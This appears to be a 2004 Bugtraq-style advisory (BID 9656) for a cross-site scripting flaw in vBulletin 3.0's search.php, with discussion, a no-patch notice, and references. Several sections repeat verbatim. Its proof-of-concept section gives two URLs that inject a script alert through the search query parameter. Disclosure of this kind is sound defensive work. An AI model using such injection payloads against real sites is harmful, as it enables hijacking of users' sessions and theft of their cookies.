JelSoft VBulletin Search.PHP Cross-Site Scripting Vulnerability
BID:9656
Info
JelSoft VBulletin Search.PHP Cross-Site Scripting Vulnerability
| Bugtraq ID: | 9656 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 13 2004 12:00AM |
| Updated: | Feb 13 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to "Rafel Ivgi, The-Insider" <[email protected]>. |
| Vulnerable: |
Jelsoft vBulletin 3.0 .0 can4 |
| Not Vulnerable: | |
Discussion
JelSoft VBulletin Search.PHP Cross-Site Scripting Vulnerability
It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'search.php' script. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. Successful exploitation of this issue may allow for theft of cookie-based authentication credentials or other attacks.
It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'search.php' script. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. Successful exploitation of this issue may allow for theft of cookie-based authentication credentials or other attacks.
Exploit / POC
JelSoft VBulletin Search.PHP Cross-Site Scripting Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/forum/search.php?do=process&showposts=0&query=<!-- / main error message --></p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('XSS')</script><plaintext>
http://www.example.com/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')</script>
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/forum/search.php?do=process&showposts=0&query=<!-- / main error message --></p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('XSS')</script><plaintext>
http://www.example.com/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')</script>
Solution / Fix
JelSoft VBulletin Search.PHP Cross-Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
JelSoft VBulletin Search.PHP Cross-Site Scripting Vulnerability
References:
References:
- vBulletin Homepage (vBulletin)
- vBulletin PHP Forum Version ("Rafel Ivgi, The-Insider"